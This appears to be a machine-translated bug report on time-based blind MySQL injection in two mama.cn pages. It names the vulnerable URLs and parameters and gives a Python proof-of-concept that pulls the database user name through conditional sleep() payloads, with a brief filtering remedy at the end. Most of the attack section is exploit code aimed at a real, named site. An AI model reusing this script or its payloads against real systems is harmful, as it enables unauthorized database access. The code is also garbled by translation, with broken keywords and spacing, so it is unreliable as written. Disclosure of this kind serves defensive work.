Mysql blind note (poc) on a website of alimama)

Mysql blind note (poc) on a website of alimama)

Mymysqlblind Injection

URL: http://brandbase.mama.cn/yikexin.php? Ctype = * & mod = growth & op = detail & pgcount = 12 & tid = 1520677

POST parameter: page = 20

Problematic parameter ctype:

Sqlmap cannot run this point. It was modified using the lijiejie script and didn't want to build the wheel on its own.

This is because there are two, and the other is the main station. Because of the network environment, the URL cannot be accessed, but I remember that

What does the current user start with hr? The length is 36,

URL: http://www.mama.cn: 80/photo/index. php? A = Search & d = index & g = Search & gotosearch = yes & keyword = * & num = 25 & page = 1 & searchtype = photo

The problematic parameter is keyword,

Poc:

#-*-Coding: UTF-8 -*-#! /Usr/bin/env python # mysql_timebased.pyimport httplibimport urllibheaders = {'user-agent': 'mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) gecko/20100101 Firefox/37.0 '} payloads = 'abcdefghijklmnopqrstuvwxyz1234567890. @ _ * % 'def GetUlength (): # Get the length of the current user userlen = 0 for I in range (): err_count = 0 for j in range (3): try: s1 = "length (user () = % s" % I s = "if (" + s1 + ", sleep (3), 0) /* 'xor (if (1, sleep (3), 0) OR % 22 'Xor (if (1, sleep (3), 0) OR % 22 */"url = '/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: userlen = I break return userlendef GetUser (l ): # Getting the current user name user = ''for I in range (1, l): for payload in pay Loads: err_count = 0 # print payload for j in range (3): try: s1 = "ascii (mid (lower (user (), % s, 1 )) = % s "% (I, ord (payload) s =" if ("+ s1 +", sleep (3), 0)/* 'XOR (if (1, sleep (3), 0) OR % 22 'XOR (if (1, sleep (3), 0) OR % 22 */"url ='/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: user + = payload print '\ n [info]', user break return user def main (): userlen = GetUlength () print "user length: \ n", userlen current_user = GetUser (userlen) print "\ n CurrentUser is :", current_userif _ name _ = '_ main _': print 'mysql-timebased-sqlinjection: \ n' main ()

 

Solution:

Filtering and structured SQL query